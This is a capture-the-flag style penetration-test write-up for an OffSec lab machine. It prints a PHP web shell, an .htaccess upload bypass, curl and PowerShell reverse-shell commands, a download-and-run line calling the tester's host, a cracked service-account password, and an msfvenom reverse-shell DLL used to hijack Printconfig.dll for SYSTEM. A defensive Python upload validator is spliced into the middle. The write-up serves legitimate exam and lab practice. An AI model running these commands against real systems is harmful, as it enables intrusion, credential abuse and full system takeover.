System Information
OS: Windows Architecture: x86
Service Discovery
Helper scripts source: https://github.com/CameronCandau/Pentest-Automation
new-target access 192.168.228.187
cd ~/oscp/access
scan.sh --autorecon
80/tcp HTTP

feroxbuster points out /Ticket.php:

We see that the “Buy Tickets” form submits to /Ticket.php.
File upload catches my attention. Feroxbuster also pointed out /uploads/. After uploading an image, we find that we can access it directly. This could lead to LFI if the server is misconfigured and allows us to upload/execute PHP code.

Can I upload a shell.php?
<?php if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }?>
Nope.

Initial Access
We can, however, upload a .htaccess:
AddType application/x-httpd-php .rce
Reference used in OffSec’s writeup for this box — looks like a great runbook for file upload overall: https://onsecurity.io/article/file-upload-checklist/#uploading-a-htaccess-file

We can upload shell.rce and then run it:

Same with curl:
curl -G http://192.168.228.187/uploads/shell.rce --data-urlencode "cmd=whoami"
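The .htaccess step above works only because the uploads directory accepts any filename and the web server honours per-directory handler overrides there. As an added defensive example (not part of these notes and not the lab application's code), the validator and audit below would have refused both the .htaccess and shell.rce; the function names and the image allowlist are my own assumptions.

```python
import os
import re
from pathlib import Path

# Allowlist of image extensions mapped to the magic bytes the content must start with.
ALLOWED = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}
# Directives that re-map a "static" directory to a script handler (as the AddType line above does).
RISKY_DIRECTIVE = re.compile(r"^\s*(AddType|AddHandler|SetHandler|php_value|php_flag)\b",
                             re.IGNORECASE | re.MULTILINE)

def is_upload_allowed(filename: str, content: bytes) -> tuple[bool, str]:
    """Return (accepted, reason) for one submitted file: rejects dotfiles (so .htaccess can
    never land in the directory), extensions outside the allowlist (shell.php, shell.rce)
    and bodies whose bytes do not match the declared image type (PHP renamed to .png)."""
    name = os.path.basename(filename.replace("\\", "/"))  # ignore any client-supplied path
    if not name or name.startswith("."):
        return False, "dotfiles are never accepted"
    ext = Path(name).suffix.lower()
    if ext not in ALLOWED:
        return False, f"extension {ext or '(none)'} is not an allowed image type"
    if not content.startswith(ALLOWED[ext]):
        return False, "content does not match the declared image type"
    return True, "ok"

def audit_entries(entries: dict[str, bytes]) -> list[str]:
    """Flag files (relative path -> bytes) that could turn the directory into a code-execution
    sink: a .htaccess carrying handler overrides, or anything that is not an allowed image."""
    findings = []
    for rel, data in entries.items():
        name = Path(rel).name
        if name == ".htaccess":
            if RISKY_DIRECTIVE.search(data.decode("utf-8", errors="replace")):
                findings.append(f"{rel}: .htaccess overrides the handler mapping")
        elif Path(name).suffix.lower() not in ALLOWED:
            findings.append(f"{rel}: unexpected extension {Path(name).suffix or '(none)'}")
    return findings

def audit_uploads_dir(root: str) -> list[str]:
    """Walk a real uploads directory (e.g. the web root's /uploads/) and audit every file."""
    base = Path(root)
    return audit_entries({str(p.relative_to(base)): p.read_bytes()
                          for p in base.rglob("*") if p.is_file()})
```

Running audit_uploads_dir against the web root's uploads directory on a schedule gives a cheap detective control for the same misconfiguration.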

Use it to get a reverse shell (payload generated with Penelope):
curl -G http://192.168.228.187/uploads/shell.rce --data-urlencode "cmd=cmd /c powershell -e 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"
Restarted lab (target IP changed to 192.168.125.187)
Privilege Escalation
Domain: access.offsec
Get-ADDomainController

Kerberoasting svc_mssql
No accounts vulnerable to AS-REP roasting.

1 Kerberoastable user, svc_mssql

Cracked using rockyou.txt:

…

Validate with NetExec:

Add to credentials: svc_mssql:trustno1

Interesting because we didn’t see any MSSQL server running on this host. Also not from the host itself:
(nothing listening on 1433/TCP)

No password reuse, only valid for svc_mssql:

RunasCs.exe as svc_mssql
RunasCs.exe to log in locally, since we can’t remote in as svc_mssql.
Confirm usage and that we’re able to run commands as svc_mssql:
RunasCs.exe svc_mssql trustno1 "powershell whoami"
Establish reverse shell:
.\RunasCs.exe svc_mssql trustno1 "powershell -e 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"
This base64 encoded payload didn’t work for me while using RunasCs.exe, so I switched to a staged payload instead, which succeeded.
stage.ps1
IEX(IWR http://192.168.45.173:8001/scripts/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 192.168.45.173 443

SeManageVolume for System
According to https://github.com/gtworek/Priv2Admin, SeManageVolume can get us admin.
From Google I found https://github.com/CsEnox/SeManageVolumeExploit which should allow us to abuse the privilege to elevate to Administrator.
After downloading the compiled binary from this repo, transferring it to the target, and running as svc_mssql, it seems that we’re now able to write to System32.
icacls output for C:\Windows\System32 confirms that BUILTIN\Users has (F)ull access.

Continuing to follow this repo’s directions, I’ll replace C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll with a malicious DLL.
Another example of DLL hijacking/overwriting that we could have used at this point is https://github.com/sailay1996/WerTrigger
Generate the DLL:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.173 LPORT=4444 -f dll > Printconfig.dll
Transfer to host, make a copy of Printconfig.dll in case we need to restore it, and then replace the original with ours. Then, use the PowerShell from the repo to initiate PrintNotify, which will load Printconfig.dll as SYSTEM, giving a reverse shell.
$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
$object = [Activator]::CreateInstance($type)
Proof Screenshots (local.txt / proof.txt)
type or cat flag and include IP address in screenshot
